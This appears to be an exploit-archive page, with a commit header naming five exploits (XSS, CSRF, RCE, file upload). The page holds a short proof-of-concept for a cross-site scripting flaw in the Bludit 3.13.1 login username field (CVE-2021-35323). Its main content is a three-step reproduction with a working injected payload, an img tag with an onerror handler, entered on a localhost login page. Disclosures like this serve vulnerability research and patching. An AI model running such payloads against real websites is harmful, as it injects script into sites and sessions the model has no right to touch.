a4598bc3c4
5 changes to exploits/shellcodes Bludit 3.13.1 - 'username' Cross Site Scripting (XSS) Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS) (Authenticated) SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit) GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
14 lines
No EOL
516 B
Text
14 lines
No EOL
516 B
Text
# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
|
|
# Date: 19/10/2021
|
|
# Exploit Author: Vasu (tamilan_mkv)
|
|
# Vendor Homepage: https://www.bludit.com
|
|
# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
|
|
# Version: bludit-3-13-1
|
|
# Tested on: kali linux
|
|
# CVE : CVE-2021-35323
|
|
|
|
### Steps to reproduce
|
|
|
|
1. Open login page http://localhost:800/admin/login;
|
|
2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password
|
|
3. Trigger the malicious javascript code |